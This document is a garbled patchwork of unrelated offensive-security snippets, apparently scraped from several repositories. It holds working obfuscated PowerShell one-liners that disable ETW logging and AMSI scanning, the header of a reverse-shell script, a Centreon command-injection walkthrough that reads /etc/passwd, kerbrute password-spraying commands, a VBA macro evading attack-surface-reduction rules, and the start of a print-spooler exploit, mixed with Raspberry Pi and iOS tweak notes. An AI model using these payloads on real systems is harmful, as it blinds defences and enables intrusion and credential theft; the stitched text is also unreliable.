To test any of these techniques, simply type "Invoke-Mimikatz" into your PowerShell terminal: you'll notice that even if you haven't imported Mimikatz, AMSI flags the string as malicious. If AMSI is off or has been evaded, PowerShell instead reports that the term "is not recognized as the name of a cmdlet", which tells you the bypass worked.
However, some methods may be detected by the AV, but most of them work without problems.
The first and worst way to bypass AMSI is downgrading PowerShell to version 2.0.
<#
DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls.
The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess.
Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions
from ws2_32.dll.
This script should be used for educational purposes only (and maybe while playing CTF :D).
It was only tested on Windows 10 (x64) and is probably not stable or portable. Its only
purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as
# Logging bypass:
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# AMSI Bypass (old, burned)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# New AMSI bypass obfuscation:
Centreon 19.04 allows attackers to execute arbitrary OS commands via the Command Line field
of main.php?p=60807&type=4 (aka the Configuration > Commands > Discovery screen).
------------------------------------------
[Additional Information]
Once one has logged into Centreon:
1. navigate to: Configuration > Commands > Discovery OR http://ip-address/centreon/main.php?p=60807&type=4
2. in the "Command Line" section put a command: e.g. "cat /etc/passwd" without quotes.
Preface:
I have no idea if any of this is the "right" way of doing it. This is just how I got my unit working.
Good luck.
WARNING: Do not use a V1 Waveshare display module with a stock pwnagotchi! The pwnagotchi expects a V2 module, and may irreparably damage a V1 module!
A V1 display module *can* work, but you must modify `waveshare.py` and `display.py` beforehand. For the time being, this is left as an exercise for the reader.
If you have already burnt a V1 display, try disconnecting it from the Pi and leaving it overnight. This may rejuvenate the display somewhat, but it will likely still display signs of damage.
Installation:
1. `dd` Raspbian Lite to an SD card.
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
This tweak is useless without following the steps below.
Description: Use your Apple Watch to respring/reboot/safemode your connected device.
You can download the ipa file here: https://mega.nz/#!8qgRjJCA!CZjS2FiZ1wKpq5oBZt-MXOxK_kcGOYAvwur_QFh8o7g
Then re-sign with cert only (no prov profile) with iOS App Signer found here: http://dantheman827.github.io/ios-app-signer/
Then install with Xcode > Window > Devices & Simulators > Connected Device > +
Then install the "Core WatchUtils" dependency from my beta repo here: https://cokepokes.github.io/ and respring.